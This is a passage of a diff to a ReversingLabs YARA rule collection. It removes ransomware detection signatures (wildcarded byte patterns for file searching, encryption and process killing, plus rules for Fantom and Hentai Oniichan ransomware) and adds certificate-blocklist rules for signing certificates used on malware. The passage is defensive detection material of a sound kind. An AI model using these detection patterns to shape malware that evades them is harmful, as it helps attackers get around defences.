-            ?? 50 E8 ?? ?? ?? ?? 8D 04 24 50 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 8B 1D ??
-            ?? ?? ?? 55 56 57 8B 3D ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ?? ??
-            ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 8D 84 24 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 50 89 74 24 ?? FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84
-            74 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ??
-            50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ??
-            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF B4 24
-            ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ??
-            50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ??
-            50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
-            84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50
-            55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
-        }
-		$search_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B F8 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6
-            8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A
-            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89
-            04 B7 51 50 FF 15 ?? ?? ?? ?? 46 FE 85 ?? ?? ?? ?? D1 EB 75 ?? EB ?? 68 ?? ?? ?? ??
-            FF 34 B7 FF 15 ?? ?? ?? ?? 85 C0 74
-        }
-		$encrypt_files_2 = {
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 24 24 ?? 53 55 56 57 E8 ?? ?? ?? ?? 8B D0 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 1D ?? ?? ??
-            ?? 8B 35 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 7C 24 ??
-            FF D3 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 7C ?? ?? ?? ?? 8D 44
-            24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 4C 24 ?? E8 ?? ?? ?? ?? 8B F8 33 D2 F6 44
-            24 ?? ?? 8B CF 74 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 FF D3 8D 94 24 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            42 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
-            ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 51 6A ?? 5A 8B
-            CF E8 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ??
-            ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ??
-            ?? ?? 50 FF D3 6A ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B 7C 24 ?? 59 8D 44 24 ??
-            50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? E8
-            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C2
-        }
-		$kill_specific_processes_2 = {
-            81 EC ?? ?? ?? ?? 56 57 6A ?? 5E 56 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89
-            74 24 ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8D 84 24 ??
-            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 53 55 BE ?? ?? ??
-            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 8B E8 33 D2 85 ED 7E ?? 0F BE 0C 1A E8 ?? ?? ?? ?? 88 04 1A 42 3B D5 7C ?? FF 36
-            53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? 85 C0 74 ?? 33 DB
-            53 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? FF B4
-            24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D
-            44 24 ?? 50 53 53 68 ?? ?? ?? ?? 53 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ??
-            ?? 8D 84 24 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? 5D 5B 5F 5E 81 C4 ?? ?? ?? ?? C2
-        }
-		$kill_specific_processes_1 = {
-            81 EC ?? ?? ?? ?? 55 56 57 6A ?? 5E 56 33 ED 8D 44 24 ?? 55 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF ?? 0F 84 ?? ?? ?? ??
-            53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 8B 5C
-            24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24 ?? 85 C0 7E ?? 8B F8
-            0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24 ?? ?? ?? ?? FF 34 B0
-            55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ?? ?? ?? 7C ?? 8B 7C 24
-            ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 50 FF
-            15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55 8D 84 24 ?? ?? ?? ??
-            50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 57 FF 15 ?? ?? ?? ?? 5B 5F 5E 5D 81 C4 ?? ?? ?? ?? C2
-        }
-		$encrypt_files_3 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 33 C0 66 89 84 74 ?? ??
-            ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 44 24 ?? 50 E8 ?? ?? ??
-            ?? F6 44 24 ?? ?? 8B F0 74 ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 44 24 ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF
-            D7 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 74 ?? 83 E0 ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 50 FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 6A ?? 8D 84 24
-            ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 74 24 ?? 59 8D 44 24 ?? 50 55 FF 15
-        }
-		$search_files_2 = {
-            53 55 56 57 8B 3D ?? ?? ?? ?? 6A ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 8B E8 FF 15 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 33 F6 8D 84 24 ?? ??
-            ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 DB 74 ?? F6 C3 ?? 74 ?? 8D 84 24 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? C6 84
-            24 ?? ?? ?? ?? ?? FF D7 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 B5 ?? 51 50
-            FF 15 ?? ?? ?? ?? 46 FE 84 24 ?? ?? ?? ?? D1 EB 75 ?? 33 FF 85 F6 7E ?? 8B 9C 24 ??
-            ?? ?? ?? 8D 44 24 ?? 2B E8 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8C
-            24 ?? ?? ?? ?? 89 48 ?? 8D 0C BD ?? ?? ?? ?? 03 CD 89 58 ?? 8B 4C 0C ?? 89 08 33 C9
-            51 51 50 68 ?? ?? ?? ?? 51 51 FF 15 ?? ?? ?? ?? 89 44 BC ?? 47 3B FE 7C ?? 6A ?? 6A
-            ?? 8D 44 24 ?? 50 56 FF 15
-        }
-		$kill_specific_processes_3 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 89 74 24 ?? 55 6A ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 83 FF
-            ?? 0F 84 ?? ?? ?? ?? 53 8D 84 24 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 50 57
-            E8 ?? ?? ?? ?? 8B 5C 24 ?? 83 BC 24 ?? ?? ?? ?? ?? 8B F5 7E ?? 55 8D 84 24 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 8B E8 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 DB 89 44 24
-            ?? 85 C0 7E ?? 8B F8 0F BE 0C 2B 51 E8 ?? ?? ?? ?? 88 04 2B 43 3B DF 7C ?? 8B 84 24
-            ?? ?? ?? ?? FF 34 B0 55 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 46 50 5D 3B B4 24 ?? ??
-            ?? ?? 7C ?? 8B 7C 24 ?? 33 ED 85 DB 74 ?? 55 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 55 50 FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 FF
-            15 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 8D 44 24
-            ?? 50 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? 50 55 55 68 ?? ?? ?? ?? 55 55 55
-            8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 57 E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Funbit" and pe.signatures [ i ] . serial == "7c:ad:9c:37:f7:af:fa:8f:4d:82:29:f9:76:07:e2:65" and 1122508800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_098A57 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4604f1a6-2fdb-5917-943d-f0e2dbaaa29e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14112-L14128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5e203f87dd4608ba5d583e02ce86fbe230e45fff86a7a697766e149d0cf6f436"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_files_1 and $encrypt_files_1 and $kill_specific_processes_1 ) or ( $search_files_1 and $encrypt_files_2 and $kill_specific_processes_2 ) or ( $search_files_2 and $encrypt_files_3 and $kill_specific_processes_3 ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELECTRONIC GROUP" and pe.signatures [ i ] . serial == "09:8a:57" and 1032855179 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5389Cc6286Da3Bfa1Dc4Df498Bf68361 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Fantom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cd32de8b-2c14-5fb4-be79-365d9848f341"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "973aaf33-25a2-5f40-a5a7-d9f77e3589b3"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L14130-L14146"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d25d998c980f47f4da065155451503dcbc677ad041af85a6ed7060ecadec66b3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Fantom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ??
-            26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28
-            ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20
-            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? 13 ?? 11 ?? 16
-        }
-		$encrypt_files_2 = {
-            72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ??
-            19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11
-            ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11
-        }
-		$lockfile = {
-            02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ??
-            03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D
-            00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28
-            ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2]
-            6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ??
-            ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ??
-            16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ??
-            ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03
-            [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2A
-        }
-		$lockdir = {
-            03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ??
-            00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25
-            7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02
-            07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE
-            ?? 26 DE ?? 08 17 58 0C 2B ?? 2A
-        }
-		$sendkey = {
-            00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ??
-            0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ??
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $encrypt_files_* ) ) and $lockfile and $lockdir and $sendkey )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Joerm.com" and pe.signatures [ i ] . serial == "53:89:cc:62:86:da:3b:fa:1d:c4:df:49:8b:f6:83:61" and 1495497600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Ed9Caeb7911B31Bd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Hentai Oniichan ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cd5e916f-7195-5bb6-abff-b08231053f9a"
-		date = "2021-03-05"
-		modified = "2021-03-05"
+		id = "1eeff730-c2ce-5689-a8cb-455618738a82"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.HentaiOniichan.yara#L1-L140"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "153526e5a2f05bc8e3f77d83eefce6b4cd962ea093b6f1c0ab8fcabe8d8a7ad9"
